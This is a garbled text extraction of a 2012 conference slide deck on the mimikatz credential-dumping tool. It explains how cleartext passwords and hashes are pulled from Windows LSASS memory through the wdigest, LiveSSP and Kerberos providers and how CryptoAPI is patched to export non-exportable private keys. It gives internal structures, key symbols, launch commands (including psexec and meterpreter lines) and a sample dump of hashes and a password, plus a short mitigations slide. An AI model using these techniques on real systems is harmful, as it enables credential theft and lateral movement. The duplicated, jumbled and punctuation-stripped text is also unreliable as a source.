ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa wdigest mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
because clear text password over httphttps is not cool
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16 16
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17 17
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18 18
mimikatz sekurlsa wdigest theory
mimikatz sekurlsa wdigest theory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigest workflow
mimikatz sekurlsa wdigest workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flink struct _KIWI_WDIGEST_LIST_ENTRY Blink DWORD UsageCount struct _KIWI_WDIGEST_LIST_ENTRY This LUID LocallyUniqueIdentifier [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password [hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LKIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigest demo time
mimikatz sekurlsa wdigest demo time
sekurlsawdigest
sekurlsawdigest
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21 21
mimikatz sekurlsa livessp mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
because Microsoft was too good in closed networks
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22 22
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23 23
0 kdgt process 0 0 lsassexe PROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4 DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not Accessiblegt Image lsassexe 0 kdgt process i 83569040 You need to continue execution (press g ltentergt) for the context to be switched When the debugger breaks in again you will be in the new process context 0 kdgt g Break instruction exception - code 80000003 (first chance) ntRtlpBreakWithStatusInstruction 814b39d0 cc int 3 0 kdgt reload user Loading User Symbols 0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g 0 kdgt g
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24 24
lsasrvLsaProtectMemory livesspLiveMakeSupplementalCred livesspLiveMakeSecPkgCredentials livesspLsaApLogonUserEx2 livesspSpiLogonUserEx2 lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2 livesspLsaApLogonUserEx2 (74781536) [] livesspLsaApLogonUserEx2+0x560 (74781a96) call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livessp workflow
mimikatz sekurlsa livessp workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flink struct _KIWI_LIVESSP_LIST_ENTRY Blink PVOID unk0 PVOID unk1 PVOID unk2 PVOID unk3 DWORD unk4 DWORD unk5 PVOID unk6 LUID LocallyUniqueIdentifier LSA_UNICODE_STRING UserName PVOID unk7 PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LISKIWI_LIVESSP_LIST_ENTRY KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSupp DWORD unk0 LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26 26
Me yes
mimikatz sekurlsa kerberos mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
lsasrvLsaProtectMemory kerberosKerbHideKey kerberosKerbCreatePrimaryCredentials kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory kerberosKerbHidePassword kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory wdigestSpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
